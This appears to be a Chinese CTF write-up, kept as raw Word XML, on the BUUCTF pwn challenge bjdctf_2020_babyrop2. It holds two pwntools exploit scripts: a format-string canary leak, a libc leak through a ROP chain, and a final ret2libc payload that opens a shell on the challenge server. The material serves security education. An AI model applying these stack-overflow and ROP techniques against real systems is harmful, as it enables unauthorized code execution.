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E078" w14:textId="03C39444" w:rsidR="00321855" w:rsidRDefault="00321855" w:rsidP="00321855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  <w:r w:rsidRPr="00321855">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02639071" wp14:editId="16ECC87A">
            <wp:extent cx="5149850" cy="2019300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="395497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558FC" w14:textId="3A1967D7" w:rsidR="00321855" w:rsidRDefault="00321855" w:rsidP="00321855">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放到64位ida看一下</w:t>
      </w:r>
      <w:r w:rsidR="00201ABA" w:rsidRPr="00201ABA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="179E1508" wp14:editId="4ABD54F5">
            <wp:extent cx="5274310" cy="1243965"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1099105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05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ABA" w:rsidRPr="00201ABA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BB170CE" wp14:editId="46340233">
            <wp:extent cx="5274310" cy="2174240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1640347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7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6928" w14:textId="508B44CC" w:rsidR="00201ABA" w:rsidRDefault="00201ABA" w:rsidP="00201ABA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00201ABA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EDE79B8" wp14:editId="4FD8566C">
            <wp:extent cx="5274310" cy="1532890"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="345669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69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24C5" w14:textId="438F9DC3" w:rsidR="00201ABA" w:rsidRDefault="00201ABA" w:rsidP="00201ABA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我的来理解是vuln有个read的栈溢出，那么就可以利用libc构造rop链，但金丝雀保护我没找到在哪</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1A92A9" w14:textId="0BBF0DB0" w:rsidR="00201ABA" w:rsidRDefault="00201ABA" w:rsidP="00201ABA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3．我写的脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FE9FDE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lastRenderedPageBreak/>
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1447B236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from LibcSearcher import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8C7BB0" w14:textId="77777777" w:rsidR="00201ABA" w:rsidRDefault="00201ABA" w:rsidP="00201ABA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3171E003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 = remote("node5.buuoj.cn", 26968)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AB9B18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elf = ELF("pwn")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A69D6E9" w14:textId="77777777" w:rsidR="00201ABA" w:rsidRDefault="00201ABA" w:rsidP="00201ABA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="796697C3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printf_plt = elf.plt["printf"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD8FBFD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printf_got = elf.got["printf"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72480554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start = elf.sym["_start"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5001616C" w14:textId="77777777" w:rsidR="00201ABA" w:rsidRDefault="00201ABA" w:rsidP="00201ABA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60035A74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p.recvuntil(b"Pull up your sword and tell me u story!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB1F565" w14:textId="77777777" w:rsidR="00201ABA" w:rsidRDefault="00201ABA" w:rsidP="00201ABA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75201B0D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offset = 28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBAA932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pop_rdi = 0x00400993</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F9DD85" w14:textId="77777777" w:rsidR="00201ABA" w:rsidRDefault="00201ABA" w:rsidP="00201ABA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76B428FB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payload1 = b"A" * offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78951426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payload1 += p64(pop_rdi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A32F676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payload1 += p64(printf_got)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6025BBB2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payload1 += p64(printf_plt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229E89A9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payload1 += p64(start)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3713E4BF" w14:textId="77777777" w:rsidR="00201ABA" w:rsidRDefault="00201ABA" w:rsidP="00201ABA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="113B50C0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p.sendline(payload1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9595AA" w14:textId="77777777" w:rsidR="00201ABA" w:rsidRDefault="00201ABA" w:rsidP="00201ABA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="249B7247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printf_addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7BC742" w14:textId="77777777" w:rsidR="00201ABA" w:rsidRDefault="00201ABA" w:rsidP="00201ABA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79983B64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libc = LibcSearcher("printf", printf_addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602B5473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libc_base = printf_addr - libc.dump("printf")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7953B9FB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lastRenderedPageBreak/>
        <w:t>system_addr = libc_base + libc.dump("system")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C12DC34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bin_sh_addr = libc_base + libc.dump("str_bin_sh")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9680D9" w14:textId="77777777" w:rsidR="00201ABA" w:rsidRDefault="00201ABA" w:rsidP="00201ABA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD9C306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p.recvuntil(b"Pull up your sword and tell me u story!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1B8DE1" w14:textId="77777777" w:rsidR="00201ABA" w:rsidRDefault="00201ABA" w:rsidP="00201ABA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F1EBC44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payload2 = b"A" * offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69295A23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payload2 += p64(pop_rdi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7273DDF5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payload2 += p64(bin_sh_addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6216F9C3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payload2 += p64(system_addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26788E20" w14:textId="77777777" w:rsidR="00201ABA" w:rsidRDefault="00201ABA" w:rsidP="00201ABA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79F124C2" w14:textId="77777777" w:rsidR="00201ABA" w:rsidRDefault="00201ABA" w:rsidP="00201ABA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.sendline(payload2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1D4F5B" w14:textId="257A3CF0" w:rsidR="00201ABA" w:rsidRDefault="00201ABA" w:rsidP="00201ABA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2696EF70" w14:textId="11A3ECDF" w:rsidR="00201ABA" w:rsidRDefault="00201ABA" w:rsidP="00201ABA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4．看一下官方的写法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029BC1B8" w14:textId="48FE60EC" w:rsidR="00844918" w:rsidRDefault="001F73A7" w:rsidP="00201ABA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经过我的深思熟虑我终于理解了，首先看第一个函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21863B4C" w14:textId="359D8423" w:rsidR="001F73A7" w:rsidRDefault="001F73A7" w:rsidP="00201ABA">
      <w:r w:rsidRPr="00201ABA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76E30F06" wp14:editId="19857ED6">
            <wp:extent cx="5274310" cy="2174240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1411469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47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EBF7" w14:textId="219C2228" w:rsidR="001F73A7" w:rsidRDefault="001F73A7" w:rsidP="00201ABA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>明显的格式化字符串的漏洞，并且我们要利用这个点来找Canary，因为输入是我们唯一可控的数据，我们要找到我们的输入在栈上的位置，然后利用相对偏移来泄露Canary的值，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C72EC1F" w14:textId="7FAFE355" w:rsidR="00844918" w:rsidRDefault="006F5F39" w:rsidP="00201ABA">
      <w:r w:rsidRPr="006F5F39">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="311D17D3" wp14:editId="64F0A9D3">
            <wp:extent cx="4921250" cy="1244600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7400624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A0E83" w14:textId="34EB544B" w:rsidR="00844918" w:rsidRDefault="006F5F39" w:rsidP="00201ABA">
      <w:r w:rsidRPr="006F5F39">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64C77358" wp14:editId="1062AF4A">
            <wp:extent cx="4787900" cy="1435100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7808716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9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DFF3" w14:textId="4CC716F5" w:rsidR="002C2B49" w:rsidRDefault="002C2B49" w:rsidP="00201ABA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里解释一下为什么当时第七个参数，看一下64位寄存器的排序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043F701A" w14:textId="25AF4B24" w:rsidR="002C2B49" w:rsidRDefault="002C2B49" w:rsidP="00201ABA">
      <w:r w:rsidRPr="002C2B49">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50E27573" wp14:editId="5F1C7301">
            <wp:extent cx="5274310" cy="4520565"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="959750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50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0711" w14:textId="77B5C65E" w:rsidR="002C2B49" w:rsidRDefault="002C2B49" w:rsidP="00201ABA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>汇编代码在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下存放了Canary的值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE9B956" w14:textId="5591157F" w:rsidR="006F5F39" w:rsidRDefault="006F5F39" w:rsidP="00201ABA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从这里泄露Canary的位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0468867A" w14:textId="77777777" w:rsidR="00844918" w:rsidRDefault="00844918" w:rsidP="00201ABA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32BA9A81" w14:textId="451A570F" w:rsidR="00844918" w:rsidRDefault="00844918" w:rsidP="00201ABA">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F03A6C" w14:textId="0C9042B6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14FE2BC9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from LibcSearcher import LibcSearcher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E27CBB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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD8136A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elf= ELF(r"C:\Users\lezho\Desktop\misc\bjdctf_2020_babyrop2")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586D7830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r=remote("node5.buuoj.cn",25164)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA8A97E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read_got=elf.got['read']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337B41BB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puts_plt=elf.plt['puts']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A957F9F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vul=0x0400887</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744DC4AF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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667F6A2E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pop_rdi=0x0400993</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4119433F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ret=0x04005f9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0135AE3E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r.recvuntil(b'help u!')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>#输入提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036A38A6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r.sendline(b'%7$p')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#直接发送，这里用sendline可以实现换行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0BEDA8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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA91197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r.recvuntil(b'\n')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A14BA51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#然后程序接收的这个换行，emmm,这里实际上我觉得也可以直接接收到0x,然后再接收16个长度，刚好就得到canary,因为刚刚动调的时候发现的canary长度为16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583C793C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canary=eval(r.recvline()[:-1])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303DB66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#一直到-1是去掉换行符，然后eval将字节转为数字，这里这部分应该也是挺灵活的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6604A168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print(canary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB10C50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r.recvuntil(b'story!\n')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>#输入提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55324ABA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payload = b'a'*(0x18) + p64(canary) + p64(1) + p64(pop_rdi) + p64(read_got)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0569B078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payload+=p64(puts_plt)+p64(vul)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A3987A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#这里也是常规的构造，输出read函数地址之后然后回到vul函数继续栈溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191D5298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r.send(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F655A2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</w:p>
    <w:p w14:paraId="493FD51C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read_addr=u64(r.recv(6).ljust(8,b'\x00'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DF61EC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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BC70E8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libc=LibcSearcher('read',read_addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C442369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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0F56A6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offset=read_addr-libc.dump('read')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007C008A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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302D66B4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system=libc.dump('system')+offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C9E68D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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549E886D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binsh=libc.dump("str_bin_sh")+offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E48D9F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#这里往上都是常规</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B19E64D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r.recvuntil(b'story!\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA4F422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payload1 = b'a'*(0x18) + p64(canary) + p64(1)+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3236A63A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#一个很基础的payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7593CBDE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>r.sendline(payload1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42010AD2" w14:textId="77777777" w:rsidR="00844918" w:rsidRDefault="00844918" w:rsidP="00844918">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4861A181" w14:textId="3D08E7D7" w:rsidR="00844918" w:rsidRDefault="00844918" w:rsidP="00844918">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r.interactive()</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008449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4268F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="80ACB364"/>
    <w:lvl w:ilvl="0" w:tplc="C06ECCE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808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55"/>
    <w:rsid w:val="001F73A7"/>
    <w:rsid w:val="00201ABA"/>
    <w:rsid w:val="002C2B49"/>
    <w:rsid w:val="00321855"/>
    <w:rsid w:val="006F5F39"/>
    <w:rsid w:val="00844918"/>
    <w:rsid w:val="0090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A9197B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1A2278FE-F973-4562-90E9-9F40286B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1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85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85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85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8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8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8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185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1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1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185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185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185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18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18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18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18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1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8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1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1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18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18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185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1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185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218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521</Words>
  <Characters>1747</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>109</Lines>
  <Paragraphs>94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2025-09-04T08:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-06T07:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>